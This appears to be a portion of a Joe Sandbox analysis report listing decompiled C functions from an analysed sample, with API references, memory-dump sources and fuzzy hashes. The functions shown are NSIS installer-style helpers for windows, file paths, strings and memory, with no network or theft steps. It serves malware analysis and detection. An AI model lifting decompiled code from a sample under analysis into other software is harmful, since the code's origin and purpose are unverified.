                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Close$Enum
                                                        • String ID:
                                                        • API String ID: 464197530-0
                                                        • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                        • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                                        • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                        • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00402E5D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x418ea0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42a210;
						if(_t2 >  *0x42a210) {
							_t3 = CreateDialogParamW( *0x42a200, 0x6f, 0, E00402DD7, 0);
							 *0x418ea0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406662(0);
					}
				} else {
					_t6 =  *0x418ea0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x418ea0 = 0;
					return _t6;
				}
			}






                                                        0x00402e64
                                                        0x00402e7e
                                                        0x00402e84
                                                        0x00402e8e
                                                        0x00402e94
                                                        0x00402e9a
                                                        0x00402eab
                                                        0x00402eb4
                                                        0x00000000
                                                        0x00402eb9
                                                        0x00402ec0
                                                        0x00402e86
                                                        0x00402e8d
                                                        0x00402e8d
                                                        0x00402e66
                                                        0x00402e66
                                                        0x00402e6d
                                                        0x00402e70
                                                        0x00402e70
                                                        0x00402e76
                                                        0x00402e7d
                                                        0x00402e7d

                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                        • GetTickCount.KERNEL32 ref: 00402E8E
                                                        • CreateDialogParamW.USER32 ref: 00402EAB
                                                        • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                        • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                                        • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                        • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405C25 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 53%
                                                        			E00405C25(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040624C(0x425ef0, _a4);
				_t21 = E00405BC8(0x425ef0);
				if(_t21 != 0) {
					E004064E0(_t21);
					if(( *0x42a21c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425ef0 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425ef0);
							_push(0x425ef0);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040658F();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B69(0x425ef0);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B1D();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                        0x00405c31
                                                        0x00405c3c
                                                        0x00405c40
                                                        0x00405c47
                                                        0x00405c53
                                                        0x00405c63
                                                        0x00405c65
                                                        0x00405c7d
                                                        0x00405c7e
                                                        0x00405c85
                                                        0x00405c86
                                                        0x00000000
                                                        0x00000000
                                                        0x00405c69
                                                        0x00405c70
                                                        0x00405c78
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405c70
                                                        0x00405c88
                                                        0x00000000
                                                        0x00405c9c
                                                        0x00405c55
                                                        0x00405c5b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405c5b
                                                        0x00405c42
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                          • Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,?,?,7476FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,7476FAA0,00000000), ref: 00405BD6
                                                          • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                          • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,?,?,7476FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,7476FAA0,00000000), ref: 00405C7E
                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,?,?,7476FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,7476FAA0), ref: 00405C8E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsn12E4.tmp
                                                        • API String ID: 3248276644-2975371209
                                                        • Opcode ID: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
                                                        • Instruction ID: 8cd04150762c6b8d6a28599447491585beeb2d0428c1c24898b3a9decc440bb2
                                                        • Opcode Fuzzy Hash: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
                                                        • Instruction Fuzzy Hash: 0BF0F42910DF1115E226323A1D0AEAF1555CE83364B4E053FF851B22C5DE3C9A538DAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 89%
                                                        			E00405224(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x4236d4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x4236d4 = _t16;
							E00404BFA();
						}
						L11:
						return CallWindowProcW( *0x4236dc, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404B7A(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040422D(0x413);
				return 0;
			}





                                                        0x00405228
                                                        0x00405232
                                                        0x0040524e
                                                        0x00405270
                                                        0x00405273
                                                        0x00405279
                                                        0x00405283
                                                        0x00405284
                                                        0x00405286
                                                        0x0040528c
                                                        0x0040528c
                                                        0x00405296
                                                        0x00000000
                                                        0x004052a4
                                                        0x0040525b
                                                        0x00405293
                                                        0x00405293
                                                        0x00000000
                                                        0x00405293
                                                        0x00405267
                                                        0x00405269
                                                        0x00000000
                                                        0x00405269
                                                        0x00405238
                                                        0x00000000
                                                        0x00000000
                                                        0x0040523f
                                                        0x00000000

                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00405253
                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                                          • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                        • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                                        • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                        • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004038C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004038C5() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216ac;
				_t3 = E004038AA(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216ac =  *0x4216ac & 0x00000000;
				return _t3;
			}







                                                        0x004038c6
                                                        0x004038ce
                                                        0x004038d5
                                                        0x004038d8
                                                        0x004038d8
                                                        0x004038da
                                                        0x004038df
                                                        0x004038e6
                                                        0x004038ec
                                                        0x004038f0
                                                        0x004038f1
                                                        0x004038f9

                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,7476FAA0,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                                        • GlobalFree.KERNEL32 ref: 004038E6
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-3081826266
                                                        • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                        • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
                                                        • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                        • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E00405B69(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                        0x00405b6a
                                                        0x00405b74
                                                        0x00405b77
                                                        0x00405b7d
                                                        0x00405b7e
                                                        0x00405b7f
                                                        0x00405b87
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405b87
                                                        0x00405b89
                                                        0x00405b91

                                                        APIs
                                                        • lstrlenW.KERNEL32(00438800,C:\Users\Public,00402F2D,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                                        • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\Public,00402F2D,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\Public
                                                        • API String ID: 2709904686-2272764151
                                                        • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                        • Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
                                                        • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                        • Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}





















                                                        0x100010e6
                                                        0x100010f0
                                                        0x100010ff
                                                        0x1000110e
                                                        0x10001119
                                                        0x1000111c
                                                        0x1000112b
                                                        0x1000112f
                                                        0x10001131
                                                        0x100011d8
                                                        0x100011de
                                                        0x10001137
                                                        0x10001138
                                                        0x10001138
                                                        0x1000113d
                                                        0x1000113e
                                                        0x10001140
                                                        0x10001143
                                                        0x1000120d
                                                        0x10001210
                                                        0x100011b0
                                                        0x100011b6
                                                        0x100011bf
                                                        0x100011c4
                                                        0x100011c7
                                                        0x00000000
                                                        0x100011c7
                                                        0x10001212
                                                        0x10001214
                                                        0x10001196
                                                        0x1000119d
                                                        0x100011a5
                                                        0x00000000
                                                        0x100011a5
                                                        0x10001161
                                                        0x10001162
                                                        0x1000116a
                                                        0x10001177
                                                        0x1000117f
                                                        0x10001188
                                                        0x1000118d
                                                        0x1000118d
                                                        0x00000000
                                                        0x10001162
                                                        0x10001149
                                                        0x100011df
                                                        0x100011df
                                                        0x100011e6
                                                        0x100011f3
                                                        0x100011f8
                                                        0x100011fb
                                                        0x10001203
                                                        0x10001205
                                                        0x10001205
                                                        0x00000000
                                                        0x100011e6
                                                        0x1000114f
                                                        0x10001152
                                                        0x00000000
                                                        0x00000000
                                                        0x10001158
                                                        0x1000115b
                                                        0x100011ac
                                                        0x00000000
                                                        0x100011ac
                                                        0x1000115d
                                                        0x1000115f
                                                        0x10001192
                                                        0x00000000
                                                        0x10001192
                                                        0x00000000
                                                        0x100011c9
                                                        0x100011c9
                                                        0x100011d3
                                                        0x00000000
                                                        0x100011d7

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.841534468.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.841525683.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841545533.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841553679.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                        • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                        • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                        • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405CA3(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                        0x00405cb3
                                                        0x00405cb5
                                                        0x00405cb8
                                                        0x00405ce4
                                                        0x00405cbd
                                                        0x00405cc6
                                                        0x00405ccb
                                                        0x00405cd6
                                                        0x00405cd9
                                                        0x00405cf5
                                                        0x00405cdb
                                                        0x00405ce2
                                                        0x00000000
                                                        0x00405ce2
                                                        0x00405cee
                                                        0x00405cf2
                                                        0x00405cf2
                                                        0x00405cec
                                                        0x00000000

                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
